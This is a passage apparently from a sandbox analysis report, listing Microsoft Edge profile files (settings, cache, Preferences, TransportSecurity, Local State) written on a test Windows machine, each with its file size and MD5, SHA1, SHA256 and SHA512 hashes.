                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

                                                                                                                                                                        Filesize

                                                                                                                                                                        33KB

                                                                                                                                                                        MD5

                                                                                                                                                                        fdbf5bcfbb02e2894a519454c232d32f

                                                                                                                                                                        SHA1

                                                                                                                                                                        5e225710e9560458ac032ab80e24d0f3cb81b87a

                                                                                                                                                                        SHA256

                                                                                                                                                                        d9315d0678ac213bbe2c1de27528f82fd40dbff160f5a0c19850f891da29ea1c

                                                                                                                                                                        SHA512

                                                                                                                                                                        9eb86ebb1b50074df9bd94f7660df6f362b5a46411b35ce820740f629f8ef77f0b49a95c5550441a7db2b2638f0ed3d0204cb8f8c76391c05401506833b8c916

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

                                                                                                                                                                        Filesize

                                                                                                                                                                        224KB

                                                                                                                                                                        MD5

                                                                                                                                                                        4e08109ee6888eeb2f5d6987513366bc

                                                                                                                                                                        SHA1

                                                                                                                                                                        86340f5fa46d1a73db2031d80699937878da635e

                                                                                                                                                                        SHA256

                                                                                                                                                                        bf44187e1683e78d3040bcef6263e25783c6936096ff0a621677d411dd9d1339

                                                                                                                                                                        SHA512

                                                                                                                                                                        4e477fd9e58676c0e00744dbe3421e528dd2faeca2ab998ebbeb349b35bb3711dcf78d8c9e7adba66b4d681d1982c31cac42024c8b19e19537a5615dac39c661

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT

                                                                                                                                                                        Filesize

                                                                                                                                                                        16B

                                                                                                                                                                        MD5

                                                                                                                                                                        46295cac801e5d4857d09837238a6394

                                                                                                                                                                        SHA1

                                                                                                                                                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                        SHA256

                                                                                                                                                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                        SHA512

                                                                                                                                                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        a283880789f639667c6873f9ca6bf17e

                                                                                                                                                                        SHA1

                                                                                                                                                                        304de9b210413d65bf07f08b365d296bc7e5574d

                                                                                                                                                                        SHA256

                                                                                                                                                                        fef9e2fc222a93a6d7ec6d34e59e58f848de0cdfa21866aa8b95ce1cdbc335ad

                                                                                                                                                                        SHA512

                                                                                                                                                                        dbdf0c57f1bf6fea8117ff17bd6a7036913eb8914306b2cd6783a1708706b763df720b64243c362b0a83f15acbdf5147937808f72e1aecbd61959cc4be5c24b5

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                        Filesize

                                                                                                                                                                        111B

                                                                                                                                                                        MD5

                                                                                                                                                                        285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                        SHA1

                                                                                                                                                                        acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                        SHA256

                                                                                                                                                                        5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                        SHA512

                                                                                                                                                                        11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        5KB

                                                                                                                                                                        MD5

                                                                                                                                                                        214604d2bc37326c67d7de6ce1a024c1

                                                                                                                                                                        SHA1

                                                                                                                                                                        ef3e9ca2f9aae677ab0472b3a7372369bcffacfb

                                                                                                                                                                        SHA256

                                                                                                                                                                        ad3f43d0541d64264fbd5cfb2a8119a7fb2c25b9d801f00ecf056fdf928718e5

                                                                                                                                                                        SHA512

                                                                                                                                                                        dd54cde35f3a5eb54ae1678f2fc34b38060d579685db08a74eba210a9a3d5d56e0310339e15f435092b15f0c7fc3065a7cfaea5b9c625a75958fdef49e136858

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5fd8de357f6ea2d13f1e5f37bff24dcc

                                                                                                                                                                        SHA1

                                                                                                                                                                        ccb64b14789d0608a54f7394eaa1586289d99c7c

                                                                                                                                                                        SHA256

                                                                                                                                                                        19cd4ce467e8560c4057650fefa906df5e2c05ddcf076ff07794470da52964d9

                                                                                                                                                                        SHA512

                                                                                                                                                                        50114fb2c5b3a1a40c4d5c38e8685a9f2529dc661f1fac955a232eaa311ca6c0f999aea78c9476ec7d9e2d0bfd1dae7b3748cf8992fc31963102706a833457dd

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        04662bb53fedb1d6ed1a707502a71385

                                                                                                                                                                        SHA1

                                                                                                                                                                        5b55fbf50186ac4fe5431c14be0c603c0851914f

                                                                                                                                                                        SHA256

                                                                                                                                                                        cf83aa6e09e1cb535b31bb6128fd37219bea4d0390b74fd6d6219dc5a79bf8b2

                                                                                                                                                                        SHA512

                                                                                                                                                                        1331741c62212e7ea8d168d9de0a2d98375b8f1b56a5ac087553ccfdea214dd0b73d7742026d1c46f4b3d64ad86339e7a9fe0cc34d3b9ad9b7103d935e17b1b0

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        bac4a90803353677a65d74506d43f229

                                                                                                                                                                        SHA1

                                                                                                                                                                        a052d42d75039fc81693fcc2a82edc4e362e4efa

                                                                                                                                                                        SHA256

                                                                                                                                                                        5fb2781aa03cb50138001362a02b127e662ecef7b9241edc3178437f50e4f0a7

                                                                                                                                                                        SHA512

                                                                                                                                                                        407ad130d376b544920202fcd8d8dc039f0f06c7745c211192ff10a9b20faffb3d3bbb1f45ac8c36e715401cced3daade0ad60f263ec939e851b280f35890524

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        24KB

                                                                                                                                                                        MD5

                                                                                                                                                                        918ecd7940dcab6b9f4b8bdd4d3772b2

                                                                                                                                                                        SHA1

                                                                                                                                                                        7c0c6962a6cd37d91c2ebf3ad542b3876dc466e4

                                                                                                                                                                        SHA256

                                                                                                                                                                        3123072fba0ea8e8f960dd213659a0c96ce2b58683593b8ea84efac772b25175

                                                                                                                                                                        SHA512

                                                                                                                                                                        c96044501a0a6a65140bc7710a81d29dac35fc6a6fd18fbb4fa5d584e9dc79a059e51cbe063ca496d72558e459ffa6c2913f3893f0a3c0f8002bbca1d1b98ea2

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        89B

                                                                                                                                                                        MD5

                                                                                                                                                                        7085a8195ecdda6d1c1f302f2ae9177b

                                                                                                                                                                        SHA1

                                                                                                                                                                        67c229c5e3228d611ef80c0ed45b5f6bcf20884a

                                                                                                                                                                        SHA256

                                                                                                                                                                        60ce81207044313a5055ac87d197a5233023a6303588557236a43f9fb8a9f2d8

                                                                                                                                                                        SHA512

                                                                                                                                                                        d66a554631327c7a129dd2926bfc782402e72e24e3615c4b9915fe42267a34a7101c266fcdc2f02356ed9db4f82151c662e94263aafda811fb69a83d004ee4c1

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        146B

                                                                                                                                                                        MD5

                                                                                                                                                                        1aa6b8834c497259084b4153426ab673

                                                                                                                                                                        SHA1

                                                                                                                                                                        a1b0300741488988185b1228088b6f631cef7284

                                                                                                                                                                        SHA256

                                                                                                                                                                        1b4cce6d26a05c5bba9e942d7e1cdaa9c2fc49276bfebc568028bffe44b743c5

                                                                                                                                                                        SHA512

                                                                                                                                                                        54b9031497097f97dfd2c3157095e10c5c06ea4d1e7790430906b09ece579913fa5df522de4e2b02ee4a81aac55eecc75acf42874e3eba864a7959c7f515f3ea

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

                                                                                                                                                                        Filesize

                                                                                                                                                                        82B

                                                                                                                                                                        MD5

                                                                                                                                                                        4211349b2fdeb8aff9a5e373d7c2ee2c

                                                                                                                                                                        SHA1

                                                                                                                                                                        08f637a36edc440afbaee8cd3766b7bbb65f52c2

                                                                                                                                                                        SHA256

                                                                                                                                                                        1f5eeb1d918f47364a0de359a1704e43ea27e73a6801d8d1562e41da966b6fc8

                                                                                                                                                                        SHA512

                                                                                                                                                                        d52e1b45ce61411639483dbe85cfd3ee74c7f8a12ccd7e66dcbdd51fee7213b6440c6fcf75a908b0941affe87d8e58d5174a116aae7033794d07eab8dc2d0a43

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                        Filesize

                                                                                                                                                                        72B

                                                                                                                                                                        MD5

                                                                                                                                                                        ede3b676017e6624b7b60cdf786a1fe9

                                                                                                                                                                        SHA1

                                                                                                                                                                        ca56ac4ed1a1cd7dedc062ed26e26b20efde1e5f

                                                                                                                                                                        SHA256

                                                                                                                                                                        825636c973476d2dff711d8c6f4239533b578f3051f0f39c49e335e698b21f0c

                                                                                                                                                                        SHA512

                                                                                                                                                                        4481279aa3ffe0be0352ee3a54ff1826e3c7264cb1331eb860838421db720eb0cc7f8764278eebfb755052cc52a10ac0a0403b36373e9bd207c5b6d43aa45eb8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59c5f6.TMP

                                                                                                                                                                        Filesize

                                                                                                                                                                        72B

                                                                                                                                                                        MD5

                                                                                                                                                                        7e89aedd819ecdbd2350851e71b389f5

                                                                                                                                                                        SHA1

                                                                                                                                                                        5a848f98427ba8e5ae8686f39262edd0095d4dbd

                                                                                                                                                                        SHA256

                                                                                                                                                                        8fcef16aaa0e4fd55273a78ff6dae4e2bacc3072fc6efcba89da85495bc15817

                                                                                                                                                                        SHA512

                                                                                                                                                                        856b3cdc0e20573b5d896bf10616bf468e71b2ef9d280f7e0ead2547e2de99aaf607bd4f04b1b7da57dde3c2a4c59908c4f06c1856e46638b72464e68b948cee

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        1e875585497220f8bb4032daf637d829

                                                                                                                                                                        SHA1

                                                                                                                                                                        36d6cbcd4602efed34eb93f66eb050beaa5b596d

                                                                                                                                                                        SHA256

                                                                                                                                                                        db3f9f7a2030f30c8719378f91bfcf21f90c6e2a053519e294532a5e40aceaa3

                                                                                                                                                                        SHA512

                                                                                                                                                                        0159fe3f895ed7985ce0d7ecbb5d86326b15156e014fb3002a0f7f3193e7d22ea7f64f8d879b0b0329c251e4266b166bd506b60d85b17f76daa364ab4baf91a8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        367619bf63b9b753920f32481fb24a50

                                                                                                                                                                        SHA1

                                                                                                                                                                        e403d7192153dac4f931edf4bda64320a1024054

                                                                                                                                                                        SHA256

                                                                                                                                                                        23c453ac9ed1b4b36985758f5c0d7c43474203fbe6efe77bba58606ac8ee1fad

                                                                                                                                                                        SHA512

                                                                                                                                                                        ff6cc3430263a5b137a7216ebbc4642f26790972732c5945585bb1a9bbf879dca0175b16dc5917c64c6ec2b10e7861c0fdef49254378a3f0fcc990b445ba1150

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        17ecdf9833010d46451a09133b8bad9a

                                                                                                                                                                        SHA1

                                                                                                                                                                        d9099eca2d14e426c9751dd87d32400a0cae73db

                                                                                                                                                                        SHA256

                                                                                                                                                                        5c9337d951852dc103497f04688f7f97c191a9e5228cc77ff3070ee4d7fd0942

                                                                                                                                                                        SHA512

                                                                                                                                                                        4d5b85445027a4c1d7b1f20a9dad3ca409fd8b114934a37c6c9fafb2b3f875495f43c12417aaa4c7db337966f61e3a6481e69fe2048708a550ddeef5d4b32440

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        de460937117562ecb4ae5c6d24619880

                                                                                                                                                                        SHA1

                                                                                                                                                                        cc75183cdb7a61cd57fad6f7373334a09dcffaa2

                                                                                                                                                                        SHA256

                                                                                                                                                                        3107b691b871faa8274b72df3c911d67b0c24419f2459cc17e2efb91a9d2751b

                                                                                                                                                                        SHA512

                                                                                                                                                                        f4d80673964bb3eaaf36327ce7869524f295e5deb92552bdc45eeb65127310754c75ddd80d83e6d69014ac21731b946917f699673993850914a241369fd4874d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        9c21583095f2969a67ab7326465d1f05

                                                                                                                                                                        SHA1

                                                                                                                                                                        9ccd77fe13ccb3487ad308fda9c942aaa4fb5ff9

                                                                                                                                                                        SHA256

                                                                                                                                                                        7808fb57d037de1bdb18db1931531e6efabd9b0d82862f2f3dca483e2b63d035

                                                                                                                                                                        SHA512

                                                                                                                                                                        e28b70679d57115f37e4d4138371630b4ebbe323711a516673399961504b3dfebc1ba271180ea98c5b94b99294f7bc2a2b0a2fad9492c9720b46e983b83da559

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        67d541362f854ddd30dbbff946d0dd8d

                                                                                                                                                                        SHA1

                                                                                                                                                                        f40688f4728b0a2e1b4f738b0d9f1e6289a3dfcd

                                                                                                                                                                        SHA256

                                                                                                                                                                        bbb5ba7cad2c02ef341710f03a37cc065a69207f2cffec89d2503994ea6282b8

                                                                                                                                                                        SHA512

                                                                                                                                                                        32ea22781c020a32ccd0dfdb099f9ee383f0ab3a6033cba46af7556d8528caf26d5f7a92303256d27fcbb2e86911a3d3668e779bfb3726db752c5beca1b66384

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe586e17.TMP

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        9ab32c1cb3b7cb1cb2915032b3e5a45e

                                                                                                                                                                        SHA1

                                                                                                                                                                        a8f12d39c0f2a9f1d2e98cbbf7a45978a003f5fd

                                                                                                                                                                        SHA256

                                                                                                                                                                        9d132cff68cb83288c0d5d897cdb151b20737d407601a0cacacf17ea1b56bf5e

                                                                                                                                                                        SHA512

                                                                                                                                                                        38a6fa23766434ab7c78d86b6ad63d47bdcd5669502dce5aa86e1125463334a96aa8b50b0a68e23bbbd14218e4af3f85e8c03466b9fb7114d919ce5c0005cdd5

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                        Filesize

                                                                                                                                                                        16B

                                                                                                                                                                        MD5

                                                                                                                                                                        6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                        SHA1

                                                                                                                                                                        58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                        SHA256

                                                                                                                                                                        0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                        SHA512

                                                                                                                                                                        9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d29d3a83f2100b2b10b8031b33a82d5f

                                                                                                                                                                        SHA1

                                                                                                                                                                        4e05a3b829b6f9ceab05511ca1ade02425d66832

                                                                                                                                                                        SHA256

                                                                                                                                                                        56f0c327454ff59bf0ae45ea95824a2b724630c4c1e8e79f5d3fb1a05f4a85d3

                                                                                                                                                                        SHA512

                                                                                                                                                                        2ff1bf64218bf6316a98f1640a56b065245633dbb6b971716c6f37cf35f79db451d860dda506873e3ace75973843b640b4f00f0164110cff7542b38496d969c8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d29d3a83f2100b2b10b8031b33a82d5f

                                                                                                                                                                        SHA1

                                                                                                                                                                        4e05a3b829b6f9ceab05511ca1ade02425d66832

                                                                                                                                                                        SHA256

                                                                                                                                                                        56f0c327454ff59bf0ae45ea95824a2b724630c4c1e8e79f5d3fb1a05f4a85d3

                                                                                                                                                                        SHA512

                                                                                                                                                                        2ff1bf64218bf6316a98f1640a56b065245633dbb6b971716c6f37cf35f79db451d860dda506873e3ace75973843b640b4f00f0164110cff7542b38496d969c8

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        83d571764a4d51ac3a608280c94fe56d

                                                                                                                                                                        SHA1

                                                                                                                                                                        87e810ce385abf8a215467828ff0e3e9bbb305e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        d4955ce59baa486a57ae4f894e2be1226279e77beb96c58967aa62eaa17dc632

                                                                                                                                                                        SHA512

                                                                                                                                                                        ef5b777c4437acd46478f0ffbdcd21727432213732fd0572289f658345494b3804e5b0e55f0b2dfa22aaecab8b192061e50b98fac90190abc6a2fbb7521b50cc

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        83d571764a4d51ac3a608280c94fe56d

                                                                                                                                                                        SHA1

                                                                                                                                                                        87e810ce385abf8a215467828ff0e3e9bbb305e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        d4955ce59baa486a57ae4f894e2be1226279e77beb96c58967aa62eaa17dc632

                                                                                                                                                                        SHA512

                                                                                                                                                                        ef5b777c4437acd46478f0ffbdcd21727432213732fd0572289f658345494b3804e5b0e55f0b2dfa22aaecab8b192061e50b98fac90190abc6a2fbb7521b50cc

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5e9c6fe6c6e35fae696a9b9a44cd8bd4

                                                                                                                                                                        SHA1

                                                                                                                                                                        abd8b6527172e925fa736eee03b99c7a79a9c655

                                                                                                                                                                        SHA256

                                                                                                                                                                        95b65911f997f732cbd7c323e382c702bbbb006e9faf337c6c9ecc64571d2f0b

                                                                                                                                                                        SHA512

                                                                                                                                                                        388c956b8f23975222e50c408207e86708ca7164520e32087adbbc04191778911cb8764682f99571e22fe8720da3fbb1260df473e15e24d1b27b04e8c7d0981c

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5e9c6fe6c6e35fae696a9b9a44cd8bd4

                                                                                                                                                                        SHA1

                                                                                                                                                                        abd8b6527172e925fa736eee03b99c7a79a9c655

                                                                                                                                                                        SHA256

                                                                                                                                                                        95b65911f997f732cbd7c323e382c702bbbb006e9faf337c6c9ecc64571d2f0b

                                                                                                                                                                        SHA512

                                                                                                                                                                        388c956b8f23975222e50c408207e86708ca7164520e32087adbbc04191778911cb8764682f99571e22fe8720da3fbb1260df473e15e24d1b27b04e8c7d0981c

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        0b56eff6fe3bc11506ab43dc6df69646

                                                                                                                                                                        SHA1

                                                                                                                                                                        03978be8881a978e5decaf0698c53f280277a390

                                                                                                                                                                        SHA256

                                                                                                                                                                        bb5778cabe774821999bcedf6571680a64c1fa83e499ea84d0a806da97485097

                                                                                                                                                                        SHA512

                                                                                                                                                                        9e988bab9e1e806572bf36c81570e13b26338bbfe0e29e30d037f6f84c0a9bd189ea7b5aab8b365ea40b60a6abe2d08204b00fe228dd895f4ed887fef6d491ac

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        2KB

                                                                                                                                                                        MD5

                                                                                                                                                                        0b56eff6fe3bc11506ab43dc6df69646

                                                                                                                                                                        SHA1

